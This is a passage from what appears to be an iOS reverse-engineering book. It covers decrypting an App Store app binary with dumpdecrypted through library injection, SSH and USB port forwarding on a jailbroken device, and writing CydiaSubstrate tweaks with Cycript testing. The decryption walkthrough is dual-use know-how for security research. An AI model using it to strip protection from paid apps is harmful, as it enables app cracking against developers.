    1 ??         3:28.32 /sbin/launchd  
...... 
5717 ??         0:00.21 
/System/Library/PrivateFrameworks/MediaServices.framework/Support/mediaartworkd  
 5905 ??         0:00.20 sshd: root@ttys000   
 5909 ??         0:01.86 /var/mobile/Containers/Bundle/Application/03B61840 -2349-4559-
B28E-0E2C6541F879/TargetApp.app/TargetApp  
 5911 ??         0:00.07 /System/Library/Frameworks/UIKit.framework/Support/pasteboardd  
 5907 ttys000    0:00.03 -sh 
 5913 ttys000    0:00.01 ps –e 
Because now there is only one running StoreApp, the only path that contains 
“/var/mobile/Containers/Bundle/Application/”  is the full path of TargetApp’ s executable. 
4.   Find out TargetApp’s Documents directory via Cycript 
All StoreApps ’ Documents directories are under 
/var/mobile/Containers/Data/Application/ YYYYYYYY -YYYY- YYYY- YYYY–
YYYYYYYYYYYY/. Note that these Ys are different from those previous Xs, and they are not 
obtainable via “ps”. So this time we need to mak use of Cycript to reveal the Documents 
directory of  TargetApp. The commands we use are as follows:  
FunMaker -5:~ root# cycript -p TargetApp  
cy# [[NSFileManager  defaultManager]  URLsForDirectory:NSDocumentDirectory  
inDomains:NSUserDomainMask][0]  
#”file:///var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents/”  
5.   Copy dumpdecrypted.dylib to TargetApp’s Documents directory:  
snakeninnysiMac:~  snakeninny$  scp 
/Users/snakeninny/Code/dumpdecrypted/dumpdecrypted.dylib  
root@iOSIP:/var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents/  
dumpdecrypted.dylib                                                                    
100%  193KB 192.9KB/s    00:00     
Here we ’re using scp instead of iFunBox, anyway tools don ’t matter.  
 
136 6.   Start decrypting 
The usage of dumpdecrypted.dylib is as follows:  
DYLD_INSERT_LIBRARIES=/path/to/dumpdecrypted.dylib  /path/to/executable  
For instance:  
FunMaker -5:~ root# cd /var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents/  
FunMaker -5:/var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents  root# DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib  
/var/mobile/Containers/Bundle/Application/03B61840 -2349-4559-B28E-
0E2C6541F879/TargetApp.app/TargetApp  
mach-o decryption  dumper 
 
DISCLAIMER:  This tool is only meant for security  research  purposes,  not for application  
crackers.  
 
[+] detected  32bit ARM binary in memory. 
[+] offset to cryptid found: @0x81a78(from  0x81000)  = a78 
[+] Found encrypted  data at address 00004000  of length 6569984 bytes - type 1. 
[+] Opening /private/var/mobile/Containers/Bundle/Application/03B61840 -2349-4559-B28E-
0E2C6541F879/TargetApp.app/TargetApp  for reading.  
[+] Reading header 
[+] Detecting  header type 
[+] Executable  is a plain MACH-O image 
[+] Opening TargetApp.decrypted  for writing.  
[+] Copying the not encrypted  start of the file 
[+] Dumping the decrypted  data into the file 
[+] Copying the not encrypted  remainder  of the file 
[+] Setting the LC_ENCRYPTION_INFO ->cryptid  to 0 at offset a78 
[+] Closing original  file 
[+] Closing dump file 
A decrypted executable named TargetApp.decrypted will be created in the current 
directory:  
FunMaker -5:/var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents  root# ls   
TargetApp.decrypted   dumpdecrypted.dylib  OtherFiles  
Copy TargetApp.decrypted to OSX ASAP. class -dump and IDA have been waiting for ages! 
I think these 6 steps are clear enough, but some of you may still wonder, why to copy 
dumpdecrypted.dylib to Documents directory?  
Good question. We all know that StoreApps don ’t have write permission to most of the 
directories outside the sandbox. Since dumpdecrypted.dylib needs to write a decrypted file while 
residing in a StoreApp and they have the same permission, so the destination of its write 
operation should be somewhere writable. StoreApp can write to its Documents directory, so 
dumpdecrypted.dylib should be able to work under this directory. 
Let’s see what happens if dumpdecrypted.lib is not working under Documents directory:  
 
137 FunMaker -5: /var/mobile/Containers/Data/App lication/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents  root# mv dumpdecrypted.dylib  /var/tmp/  
FunMaker -5: /var/mobile/Containers/Data/Application/D41C4343 -63AA-4BFF-904B-
2146128611EE/Documents  root# cd /var/tmp  
FunMaker -5:/var/tmp  root# DYLD_INSERT_LIBRAR IES=dumpdecrypted.dylib  
/private/var/mobile/Containers/Bundle/Application/03B61840 -2349-4559-B28E-
0E2C6541F879/TargetApp.app/TargetApp  
dyld: could not load inserted  library ‘dumpdecrypted.dylib’  because no suitable  image 
found.  Did find: 
 dumpdecrypted.dylib:  stat() failed with errno=1 
 
Trace/BPT  trap: 5 
errno=1 means “ Operation not permitted ”, dumpdecrypted.dylib failed to work as 
expected. If you encounter any problem or have any experience using dumpdecrypted, you are 
welcome to share with us at http://bbs.iosre.com.  
4.5   OpenSSH  
  
Figure 4-  23 OpenSSH  
OpenSSH will install SSH service on iOS (as shown in figure 4 -23). Only 2 commands are 
the most commonly used: ssh is used for remote logging, scp is used for remote file transfer. The usage o f ssh is as follows:  
ssh user@iOSIP 
For instance:  
snakeninnysiMac:~  snakeninny$  ssh mobile@192.168.1.6  
The usage of scp is as follows:  

 
138 •  Copy a local file to iOS: 
scp /path/to/localFile  user@iOSIP:/path/to/remoteFile  
For instance:  
snakeninnysiMac:~  snakeninny$  scp ~/1.png root@192.168.1.6:/var/tmp/  
•  Copy a file from iOS to the local system:  
scp user@iOSIP:/path/to/remoteFile  /path/to/localFile  
For instance:  
snakeninnysiMac:~  snakeninny$  scp root@192.168.1.6:/var/log/syslog  ~/iOSlog  
These two commands are relatively simple and intuitive. After installing OpenSSH, make 
sure to change the default login pas sword “alpine ”. There ’re 2 users on iOS, i.e. root and 
mobile, we need to change both passwords like this:  
FunMaker- 5:~ root# passwd root 
Changing password for root. 
New password:  
Retype new password:  
FunMaker -5:~ root# passwd mobile 
Changing  password  for mobile. 
New password:  
Retype new password:  
If we forget to change the default password, there ’re chances that viruses like Ikee login as 
root via ssh. This leads to very serious security disasters: all data on iOS including SMS, contacts, 
AppleID passwords and so on is at the risk of leaking, the intruder can take control over your 
device and do whatever he wants. Therefore, promise me you ’ll change the default password 
after installing OpenSSH, OK?  
4.6   usbmuxd  
Most of you ssh into iOS via WiFi, which leads to slow responses in remote debugging or 
file copying. This is because of the instability of wireless network and the limitation of 
transmission speed. The well -known hacker, Nikias Bassen (@pimskeks) has written a tool 
named usbmuxd to forward local  OSX/Windows port to remote iOS port. With this tool, we 
can ssh into iOS via USB, greatly increasing the speed of SSH connection. usbmuxd is easy to 
use: 
1.   Download and configure usbmuxd 
Download usbmuxd from http://cgit.sukimashita.com/usbmuxd.git/snapshot/usbmuxd -
 
139 1.0.8.tar.gz  and decompress it. The files we are going to use are tcprelay.py and usbmux.py. 
Copy them to the same directory such as:  
/Users/snakeninny/Code/USB SSH/ 
2.   Forward local port to remote port with usbmuxd  
Input the following command in Terminal:  
/Users/snakeninny/Code/USBSSH/tcprelay.py  -t Remote port on iOS:Local  port on 
OSX/Windows  
Now usbmuxd is forwarding local port on OSX/Windows to remote port on iOS.  
Here comes an example of usage scenario: ssh into iOS via USB without WiFi, then debug 
SpringBoard with LLDB.  
•  Forward local port 2222 on OSX to remote port 22 on iOS:  
snakeninnysi Mac:~ snakeninny$  /Users/snakeninny/Code/USBSSH/tcprelay.py  -t 22:2222 
Forwarding  local port 2222 to remote port 22 
•  ssh into iOS and attach debugserver to SpringBoard:  
snakeninnysiMac:~ snakeninny$ ssh root@localhost -p 2222 
FunMaker- 5:~ root# debugserver *:1234 -a “SpringBoard” 
•  Forward local port 1234 on OSX to remote port 1234 on iOS:  
snakeninnysiMac:~  snakeninny$  /Users/snakeninny/Code/USBSSH/tcprelay.py  -t 1234:1234  
Forwarding  local port 1234 to remote port 1234 
•  Start debugging in LLDB: 
snakeninnysiMac:~ snakeninny$ /Applications/OldXcode.app/Contents/Developer/usr/bin/lldb   
(lldb) process connect connect://localhost:1234 
usbmuxd speeds up ssh connection to less than 15 seconds in general,  and should be your 
first ssh choice.  
 
140 4.7   iFile 
 
Figure 4-  24 iFile 
iFile is a very powerful file management App, you can view it as Finder ’s parallel on iOS. 
iFile is capable of all kinds of file operation including browsing, editing, cutting, copying and deb 
installing, possessing great convenience.  
iFile is rather user- friendly. Before installing a deb, remember to close Cydia at first, then tap 
the deb file to be installed and choose “Installer”  in the action sheet, as shown in figure 4 -25.  

 
141   
Figure 4-  25 Install deb file 
4.8   MTerminal  
 
Figure 4-  26 MTerminal  
MTerminal is an open sourced Terminal on iOS with all basic functions available. The usage 
of MTerminal is no much difference to Terminal, if we put the screen and keyboard size aside. I 

 
142 think the most practical scene of MTerminal is to test private method s in Cycript when we ’re 
blanking out on the subway or something.  
4.9   syslogd to /var/log/syslog  
 
Figure 4-  27 syslogd to /var/log/syslog  
syslogd is a daemon to record system logs on iOS, and “syslogd to /var/log/syslog”  is used 
to write the logs to a file at “/var/log/syslog ”. You need to reboot iOS after you install this 
tweak to  automatically create the file “/var/log/syslog ”. This file gets larger as time goes by, 
you can zero clear it with the following command:  
FunMaker- 5:~ root# cat /dev/null > /var/log/syslog 
4.10   Conclusion 
We’ve introduced 9 tools in this chapter, among which CydiaSubstrate, LLDB and Cycript 
are the top priorities. It is because of the existence of these iOS tools, along with the OSX toolkit 
in chapter 3, that we get a complete iOS reverse  engineering environment. There ’s a famous 
Chinese saying that we should know how as well as know why. Now that we ’ve already known 
how by finishing part 2 of this book, it ’s time for us to know why in the next part. Stay tuned!  
  

143  
Theories 
 
 
After you have learned the basic concepts of iOS reverse engineering from part 1 and then 
have tried tools mentioned in part 2 by yourself, you now are equipped with the fundamental 
knowledge of iOS reverse engineering. Once you ’ve completed all previous examples in the 
book, you may be frustrated because you don’ t know what to do next. Actually, learning 
reverse engineering is a process of getting our hands dirty, but where and how to do that? 
Luckily, there are some good patterns for us to follow. In cha pter 5 and 6, we will start from the 
perspective of Objective- C and ARM respectively, combine unique theories in iOS reverse 
engineering with tools we ’ve mentioned before, then summarize a universal methodology of 
iOS reverse engineering. Let ’s get started!  
  
III 
  
 
144  
Objective -C related iOS reverse engineering  
 
 
Objective -C is a typical object -oriented programming language and most developers are 
surely proficient with its basic usage. Using Objective -C in the introductory phase of iOS reverse 
engineering can help us get a smooth transition from App development to reverse engineering. 
Fortunately, the file format used in iOS is Mach -O and it consists of enough raw data for us to 
restore the headers of binaries through class -dump or some other tools. With th is information, 
we can start reverse engineering from the level of Objective -C, and writing tweaks is 
undoubtedly the most popular amusement at this stage. So let ’s start from writing tweaks.  
5.1   How does a tweak work in Objective -C 
When talking about Theos in  chapter 3, we have introduced the concept of tweak already. 
From wikipedia, the definition of tweak is tools for fine -tuning or adjusting a complex system, 
usually an electronic device. In iOS, tweak s refer to dylibs that can be used for enhancing the 
capabilities of other processes and they ’re the most important part in jailbroken iOS.  
Because of  tweaks, jailbreak users can customize iOS based on their own preferences. Also, 
with tweak, developers are able to enrich the functionalities of other great sof tware. All these 
facilities cannot be satisfied within the non -jailbroken iOS and AppStore. Almost all popular 
software in Cydia are various creative tweaks (A tweak icon is shown in figure 5 -1), such as 
Activator, Barrel, SwipeSelection, etc. Generally sp eaking, the core of a tweak  is a variety of 
hooks and most hooks target Objective- C methods. So how does a tweak work in Objective -C? 
  
Figure 5-  1 Tweak icon  
Objective -C is a typical object -oriented programming language; iOS consists of many small 
5 
  
 
145 components and each component is an object. For example, every single icon, message and 
photo is an object. Besides these visible objects, there are also many objects working in the 
background, providing a variety of support for foreground objects. For instance, some objects 
are responsible for communicating with servers of Apple and some others are responsible for 
reading and writing files. One object can own other objects, such as an icon object owns  a label 
object, which displays the name of the App. In general, each object has its own significance. By 
combination of different objects, developers can implement different features. In Objective -C, 
we call the function of an object “method ”. The behavior of method is called “implementation ”. 
The relationship  among objects, methods and implementation is where tweaks take effect.  
If an object is provided with some certain function, we can send it a message like [object 
method] which lets the object perform its function, i.e. we can call the method of the object . So 
far, you may wonder that “ object ” and “ method ” are both nouns, where is the verb that used to 
perform the function? Good point, we lack a verb representing the implementation of 
“method ”. So here, the word “implementation ” can be the missing verb and it means that when 
we call the method, what does iOS do inside the method, or in other words, what code is executed. In Objective -C, the relationship between method and its implementation is decided 
during run time rather than  compile time.  
During development, method in [object method] may not be a noun. Instead, it can be a 
verb. However, with only a brief [object method], we still don ’t know how this method works. 
Let’s take a look at the following examples.  
•  When here comes a phone call, we may say that “Mom, answer the phone, please”. When we want 
to translate this sentence into Objective -C, it will be [mom answerThePhone]. Here, the object is 
“mom” and the method is “answerThePhone”. The implementation could be “Mom stops cooking and goes to the sitting room to answer the phone ”. 
•  "snakeninny, come here and help me move out this box". This could be translated into [snakeninny 
moveOutTheBox]. The object here is “snakeninny” and method is “moveOutTheBox” while the 
implementation could be “snakeninny stops working and goes to the boss’ office to move a box downstairs”. 
In the above examples, if there is no specific implementation, even we call a method of an 
object, the object still doesn ’t know what to do . So now, we can think implementation as the 
interpretation of method. Is it a little confusing? Don ’t worry. Let ’s draw an analogy between 
programming and dictionary. You can just imagine the method here to be a word in the 
 
146 dictionary and the implementati on to be the meaning of that word. When you look up the 
dictionary, you always want to find what does a certain abstruse word mean. When it comes to 
programming, the implementation of a method does exactly the same as a word ’s meaning in 
the dictionary. Ea sier to understand, right? Lets ’ move on.  
As time goes on, the contents of dictionary have changed a lot and some old phrases have 
been given some new interpretations. For example, when talking along with Apple, which 
doesn’ t refer to the fruit, jailbreak is not considered a crime, and SpringBoard has nothing to do 
with a swimming pool. This phenomenon embodies in iOS especially. We can change the associated implementation of a method in order to change function of the object. As long as 
someone looks up a word in our modified dictionary, he or she will get the new meaning of the 
word. For example, in LowPowerBanner as shown in figure 5 -2, the system will show a 
notification banner as a reminder to users when the device is in low battery. Interesting? It is 
because I have changed the implementation of low battery reminder from popup alerts to 
banners.  
  
Figure 5-  2 LowPowerBanner  
Another example is SMSNinja, as shown in figure 5 -3. When you receive a spam message, 
SMSNinja puts the spam message into trash box  automatically. This feature is achieved by 
changing the implementation of delegate method of receiving a message; I ’ve added extra spam 

 
147 detecting function to the original method. This kind of approach is similar to changing the 
contents of dictionary and can be realized through the hook function provided by 
CydiaSubstrate. The usage of CydiaSubstrate has been explained in the last two chapters, so if 
you’ ve already forgotten about it, you should go back and have a review.  
  
Figure 5-  3 SMSNinja  
5.2   Methodology  of writing a tweak 
Not until understanding how tweaks work can we have a clear mind on what our goals are 
or what we are doing when we ’re writing tweaks. Generally speaking, we use C, C++ and 
Objective -C to write a tweak. When we have an idea, how can we manage to turn it into a 
useful tweak? Actually, the pattern of writing a tweak is easy to follow and it will become clearer 
when you have deeper understanding with iOS and its programming language. In the following 
part, we will focus on a simple tweak ex ample, start from the perspective of our most frequently 
used programming language Objective -C, to summarize theories of iOS reverse engineering on 
the level of Objective -C. 
5.2.1   Look for inspiration  
So far, some readers might have already been able to write tw eaks with knowledge 
introduced in the previous chapters, but most may still don ’t know where to start. I know it ’s 

 
148 uncomfortable when we don ’t know where to use our abilities, so here are some tips to help 
you look for inspiration for your first tweak.  
•  Use more, observe more 
Play with your iPhone and take a look at every corner of iOS whenever you have spare time 
rather than waste your time on social networks.  Although iOS consists of lots of amazing 
features, it still cannot meet the exact requirements of  every single user. So the more you use, 
the more you know about iOS and you are more likely to find where in iOS the user experience 
is not that good, which turns out to be inspirations. With huge base of iOS users, you will surely 
find some users who sha re the same thoughts  with you. In other words, if you have a problem 
to solve, regard it as a tweak inspiration. That ’s how Characount for Notes was born on iOS 6. 
At that time, I always saved the content of a tweet into a note. Since a tweet has a n 140 
characters limit, I ’ve written a tweak to show the character count of per note as a reminder. 
There was an Arabic user who sent mail to me to express his appreciation of this tweak and 
asked me to add more features to make it work like MSWord. But I was not interested in this 
idea, I had to say sorry to him.  
  
Figure 5-  4 Characount for Notes  
•  Listen to users’ voice 

 
149 Different people use iOS in different ways, which depends on their own requirements. If 
you don ’t have much inspiration, you can listen to the requirements of users. As long as there 
are requirements, there are potential users of your tweaks that meet these requirements.  
If large projects have been done, you can write customized tweaks for minority. If you are 
not qualified to reverse low -level f unctions, you can start from simple functions of higher level. 
After each release, listen to your users ’ feedbacks humbly and improve your tweaks with rapid 
iteration. Trust me, your effort will pay off. Take LowPowerBanner as an example, the idea of 
LowPo werBanner came from the suggestion of a user PrimeCode. I finished the first version of 
LowPowerBanner in less than 5 hours and it had no more than 50 lines of code. However, within 8 hours after the release, downloads had approached 30,000 (as shown in fi gure 5- 5), the 
popularity of it was far beyond my expectation. Remember, users ’ wisdom is inexhaustible. If 
you don ’t have any good ideas, listening to users would be surprisingly helpful!  
  
Figure 5- 5 Downloads of LowPowerBanner 1.0  
•  Anatomize iOS 
The greater your ability is, the more things you can do. Starting from writing small Apps, 
with more and more practices you will have deeper and deeper understanding of iOS. iOS is a 
closed operating system and only a tip of iceberg has been exposed to us.  There are still far too 
many features that are worth to be further explored. Every time a new jailbreak comes out, 
someone will post the latest class -dump headers on the Internet. We can easily find the 
download link by searching “iOS private headers ” on Google, which eliminates the trouble of 
class- dumping by ourselves. Objective- C methods follow a regular naming convention, making 
it possible for us to guess the meanings of most methods. For example, in SpringBoard.h:  
- (void)reboot; 
- (void)relaunchSpringBoard; 
And in UIViewController.h:  
- (void)attentionClassDumpUser:(id)arg1  
yesItsUsAgain:(id)arg2  
althoughSwizzlingAndOverridingPrivateMethodsIsFun:(id)arg3  
itWasntMuchFunWhenYourAppStoppedWorking:(id)arg4  

 
150 pleaseRefrainFromDoingSoInTheFutureOkayThanksBye:(id)arg5;  
Browsing method names is an important source of inspiration as well as a shortcut for you 
to get familiar with low -level iOS functions. The more implementation details of iOS you 
master, the more powerful tweaks you can write. Audio Recorder, developed by limneos, is a 
best example. Even though the launch of iOS dates back to 2007, there is no feature like phone 
call recording until Audio Recorder ’s born 7 years later. I ’m sure that there are a lot  of people 
who have the same idea and even have already tried to realize it by themselve s. But why only 
limneos succeeded ? It is because limneos has a deeper understanding of iOS than others. “Talk is 
cheap. Show me the code. ” 
5.2.2   Locate target files  
After we know what functions we want to implement, we should start to look for the 
binaries that provide these functions. In general, the most frequently used methods to locate the 
binaries are as follows.  
•  Fixed location 
At this stage, our targets of reverse engineering are usually dylibs, bundles and daemons. 
Fortunately, the locations of these files are almost fixed in the filesystem.  
2  CydiaSubstrate based dylibs are all stored in “/Library/MobileSubstrate/DynamicLibraries/ ”. We 
can find them without effort. 
2  Bundles can be divided into 2 categories, which are App and framework respectively. Bundles of 
AppStore Apps are stored in “/var/mobile/Containers/Bundle/Application/”, bundles of system 
Apps are stored in “/Applications/”, and bundles of frameworks are stored in “/System/Library/Frameworks” and “/System/Library/PrivateFrameworks”. For bundles of other types, you can discuss with us on http://bbs.iosre.com.  
2  Configuration files of daemons, which are plist formatted, are all stored in “/System/Library/LaunchDaemons/”, “/Library/LaunchDaemons” and 
“/Library/LaunchAgents/”. The “ProgramArguments” fields in these files are the absolute paths of 
daemon exectuables, such as: 
snakeninnys -MacBook:~  snakeninny$  plutil -p 
/Users/snakeninny/Desktop/com.apple.backboardd. plist  
{ 
...... 
  "ProgramArguments"  => [ 
    0 => "/usr/libexec/backboardd"  
  ] 
...... 
} 
 
151 •  Locate with Cydia 
Deb packages installed through command “dpkg –I” will be recorded by Cydia. You can 
locate these debs in Cydia ’s “Expert” view under “Installed ” category, as shown in figure 5 -6. 
  
Figure 5- 6 Expert view in Cydia  
Then you can choose the target App and go to “Details”  view, as shown in figure 5- 7. 

 
152   
Figure 5- 7 Details View  
After that, choose “Filesystem Content”  and you will see all files in the deb package, as 
shown in figure 5 -8. 
  
Figure 5-  8 Installed files 
You can easily find each file ’s location now.  

 
153 •  PreferenceBundle 
PreferenceBundle resides in the Settings App and its functionality is somehow vague. It can  
be either used as a configuration of another process such as “DimInCall” , shown in figure 5- 9. 
  
Figure 5-  9 DimInCall 
Or it can perform some actual operations and function like an executable such as “WLAN ”, 
shown in figure 5 -10. 

 
154   
Figure 5-  10 WLAN  
Our attention lies on actual operations of an App for sure. As a result, how to locate 
PreferenceBundle binaries that perform the actual operations is one topic for us to study. Third 
party PreferenceBundles that come from AppStore can be only used as configuration of their 
corresponding Apps, they don ’t provide any actual functions, there ’s no need to locate them. 
PreferenceBundles from Cydia are also not problems because the solution was already introduced in “locate by Cydia ”. However, when it comes to the iOS stock PreferenceBundles, 
the process of locating their binaries is a bit complicated.  
The UI of a PreferenceBundle can be written programmatically or be constructed from a 
plist file with a fixed format (You can refer to  
http://iphonedevwiki.net/index.php/Preferences_specifier_plist for the format). When we try 
to reverse engineer a PreferenceBundle, if all control object types in the PreferenceBundle UI 
come from preferences specifier plist, such as the “About ” view shown in figure 5- 11, we should 
pay attention to distinguish whether it is written programmatically or constructed from plist.  

 
155   
Figure 5-  11 About  
For a stock PreferenceBundle, if it is written programmatically, its actual function is very 
probably to be included in its binary, which can be located in 
“/System/Library/PreferenceBundles/ ”. Otherwise, if it’ s constructed from a preferences 
specifier plist, we have to analyze the relationship between the plist and its actual function, try to find a cut -in point and then locate the binary that provides the actual function. In a nutshell, 
the case of PreferenceBundle is comparatively complex and is inappropriate as a novice practice. If you find that you don ’t completely understand the content mentioned above, don ’t worry, we 
will present an example later in this chapter. Meanwhile, you can go to our website for more discussion on PreferenceBundle.  
•  grep 
Grep is a command line tool from UNIX and it is capable of searching files that match a 
given regular expression. G rep is a built -in command on OSX; on iOS, it is ported by Saurik and 
installed accompanying with Cydia by default. grep can quickly narrow down the search scope 
when we want to find the source of a string. For example, if we want to find which binaries cal l 
[IMDAccount initWithAccountID:defaults:service:], we can rely on grep after we sshed into iOS: 
FunMaker -5:~ root# grep -r initWithAccountID:defaults:service:  /System/Library/  

 
156 Binary file /System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7s  matches 
grep: /System/Library/Caches/com.apple.dyld/enable -dylibs-to-override -cache: No such 
file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCGCorePDF.dylib:  No 
such file or directory  
grep: /System/Library/Frameworks/ CoreGraphics.framework/Resources/libCMSBuiltin.dylib:  
No such file or directory  
grep: /System/Library/Frameworks/CoreGraphics.framework/Resources/libCMaps.dylib:  No 
such file or directory  
grep: /System/Library/Frameworks/System.framework/System:  No such file or directory  
From the result, we can see that the method appears in dyld_shared_cache_armv7s. Now, 
we can use grep again in the decached dyld_shared_cache_armv7s:  
snakeninnysiMac:~  snakeninny$  grep -r initWithAccountID:defaults:service:  
/Users/snaken inny/Code/iOSSystemBinaries/8.1_iPhone5  
Binary file 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/dyld_shared_cache_armv7s  matches 
grep: 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/System/Library/Caches/com.apple.xpc
/sdk.dylib:  Too many levels of symbolic  links 
grep: 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/System/Library/Frameworks/OpenGLES.
framework/libLLVMContainer.dylib:  Too many levels of symbolic  links 
Binary file 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/System/ Library/PrivateFrameworks/IM
DaemonCore.framework/IMDaemonCore  matches 
You can see that in the “/System/Library/”  directory, [IMDAccount 
initWithAccountID:defaults:service:] appears in IMDaemonCore, so we can start our analysis 
from this binary.  
5.2.3   Locate target functions  
After we’ ve located the target binaries, we can class -dump them and look for target 
methods in the headers. Locating target functions is relatively easy and can be done in two ways.  
•  Use the bulit-in search function in OSX 
It’s an undeniabl e fact that the bulit -in search function in OSX is the most powerful one 
among all operating systems I have ever used. It is so powerful that not only can we search file 
names, but also we’ re able to search file contents. Further, its search speed is fast for both 
searching inside a folder or the entire disk. Taking advantage of this tool can help us locate target files in a pile of files very fast. For example, if we are interested in the proximity sensor on 
iPhone and want to take a look at what features are provided within those related methods, we 
can open the folder in which we save class -dump headers, then type “proximity”  (case 
insensitive) in the search bar at top -right corner, as shown in figure 5 -12. 
 
157   
Figure 5-  12 Search in Finder  
In default case, all text files containing the keyword “proximity”  will be listed in Finder, as 
shown in 5 -13. 
  
Figure 5- 13 Search results in Finder  
You can also narrow down the scope of your search by choosing recursively search the file 
name in current directory. The remaining task is to open the result files and locate the target 
methods inside.  
•  grep 

 
158 Yes, it ’s grep again! Since we have already mentioned that we can use grep to search strings 
in binaries, it’ s just a piece of cake for grep to deal with t ext files. Let ’s try grep with previous 
example: 
snakeninnysiMac:~ snakeninny$ grep -r -i proximity 
/Users/snakeninny/Code/iOSPrivateHeaders/8.1   
/Users/snakeninny/Code/iOSPrivateHeaders/8.1/Frameworks/CoreLocation/CDStructures.h:             
char proximityUUID[512];  
/Users/snakeninny/Code/iOSPrivateHeaders/8.1/Frameworks/CoreLocation/CLBeacon.h:     
NSUUID *_proximityUUID;  
...... 
/Users/snakeninny/Code/iOSPrivateHeaders/8.1/SpringBoard/SpringBoard.h: - 
(_Bool)proximityEventsEnabled;  
/Users/snakeninny/Cod e/iOSPrivateHeaders/8.1/SpringBoard/SpringBoard.h: - 
(void)_proximityChanged:(id)arg1;   
Although the results of grep are comprehensive, it looks a little messy. Here, I recommend 
using the built- in search function in OSX. After all, graphical interface looks more 
straightforward than command line.  
5.2.4    Test private methods  
In reverse engineering, most methods we are interested in are private. As a result, there are 
no documentations available for reference. If lucky enough, you can get some information from 
Google. However, it may indicate that your target methods have already been reversed by 
others, hence your tweak may not be unique. If there is nothing on Google, congratulations, 
you are probably the first one to come up with the tweak idea, but you have to test the private 
methods by yourself.  
Testing Objective- C methods is much simpler than testing C/C++ functions, which can be 
done via either CydiaSubstrate or Cycript.  
•  CydiaSubstrate 
When testing methods, we mainly use CydiaSubstrate to hook them in order to determine 
when they ’re called. Suppose we think saveScreenShot: in SBScreenShooter.h is called during 
screenshot, we can write the following code to verify it:  
%hook SBScreenShotter  
- (void)saveScreenshot:(BOOL)screenshot  
{  
 %orig;  
 NSLog(@"iOSR E: saveScreenshot:  is called");  
}  
%end 
 
159 Set the tweak filter to “com.apple.springboard” , package it into a deb using Theos and 
install it on iOS, then respring. If you feel a bit rusty, don ’t worry, that ’s normal; what we care 
about is stability rather th an speed. After lock screen appears, press the home button and lock 
button at the same time to take a screenshot and then ssh into iOS to view the syslog:  
FunMaker -5:~ root# grep iOSRE: /var/log/syslog  
Nov 24 16:22:06  FunMaker -5 SpringBoard[2765]:  iOSRE: saveScreenshot:  is called 
You can see that our message is shown in syslog, which means saveScreenshot: is called 
during screenshot. Since the method name is so explicit, I think most of you still wonder can we 
really take a screenshot by calling this metho d? 
In iOS reverse engineering, don ’t be afraid of your curiosity; try Cycript to satisfy your 
curiosity.  
•  Cycript 
Before I get to know Cycript, I used Theos to test methods. For example, to test 
saveScreenshot:, I might write a tweak as follows:  
%hook SpringBoard  
- (void)_menuButtonDown:(id)down  
{  
%orig; 
SBScreenShotter *shotter = [%c(SBScreenShotter) sharedInstance];  
[shotter saveScreenshot:YES]; // For the argument here, I guess it’s YES; later 
we’ll see what happens if it’s NO  
}  
%end 
After the tweak takes effect, press the home button and saveScreenShot: will be called. Then 
you can check whether there is a white flash on screen and whether there is a screenshot in your 
album. After that, uninstall the tweak in Cydia.  
This approach looked pretty simple before I use Cycript. However, after I ’ve achieved the 
same goal with Cycript, how regretful I was that I had wasted so much time.  
The usage of Cycript has already been introduced in chapter 4. Since SBScreenShotter is a 
class in SpringBoard, we sh ould inject Cycript into SpringBoard and call the method directly to 
test it out. Unlike tweaks, Cycript doesn ’t ask for compilation and clearing up, which saves us 
great amount of time.  
ssh to iOS and then execute the following commands:  
FunMaker -5:~ root # cycript -p SpringBoard  
cy# [[SBScreenShotter sharedInstance] saveScreenshot:YES]  
 
160 Do you see a white flash on your screen with a shutter sound and a screenshot in your 
album, just like pressing home button and lock button together? OK, now it ’s sure that  calling 
this method manages to take a screenshot. To further satisfy our curiosity, press the up key on 
keyboard to repeat the last Cycript command and change YES to No. What is the execution 
result? We will disclose the details in next section.  
5.2.5    Analyze method arguments  
In the above example, in spite of clear arguments and obvious name meanings, we still 
don’ t know whether we should pass YES or NO to the argument, so we have to guess. By 
browsing the class -dump headers, we can see that most argument types  are id, which is the 
generic type in Objective -C and is determined in runtime. As a consequence, we can ’t even 
make any guesses. Starting from getting inspiration, we have overcome so many difficulties to 
reach arguments analyzing. Should we give up only one step away from the final success? No, 
absolutely not. We still have CydiaSubstrate and Theos.  
Do you still remember how to judge when a method is called? Since we can print out a 
custom string, we can also print out arguments of a method. A very useful  method, 
“description” , can represent the contents of an object as an NSString, and object_getClassName 
is able to represent the class name of an object as a char*. These two representations can be 
printed out by %@ and %s respectively and as a result, we will be given enough information for 
analyzing arguments. For the above screenshot example, whether the argument of saveScreenShot: is YES or NO just determines whether there is a white flash on screen. 
According to this clue, we can locate the suspicious SBScreenFlash class very soon, which 
contains a very interesting method flashColor:withCompletion:. We know that the flash can be enabled or not, are there also any possibilities for us to change the flash color? Let ’s write the 
following code to satisfy our curiosity. 
%hook SBScreenFlash  
- (void)flashColor:(id)arg1 withCompletion:(id)arg2  
{  
 %orig;  
 NSLog(@"iOSRE: flashColor: %s, %@", object_getClassName(arg1), arg1); // [arg1 
description] can be replaced by arg1  
}  
%end 
We present it here as an exercise for you to rewrite it as a tweak.  
 
161 After the tweak is installed, respring once and take a screenshot. Then ssh to iOS to check 
the syslog again, you should find information as follows:  
FunMaker -5:~ root# grep iOSRE: /var/log/syslog  
Nov 24 16:40:33 FunMaker -5 SpringBoard[2926]: iOSRE: flashColor: 
UICachedDeviceWhiteColor, UIDeviceWhiteColorSpace 1 1  
It can be seen that flash color is an object of type UICachedDeviceWhiteColor, and its 
description is "UIDevice WhiteColorSpace 1 1". According to the Objective -C naming 
conventions, UICachedDeviceWhiteColor is a class in UIKit, but we cannot find it in the 
document, meaning it is a private class. Class- dump UIKit and then open 
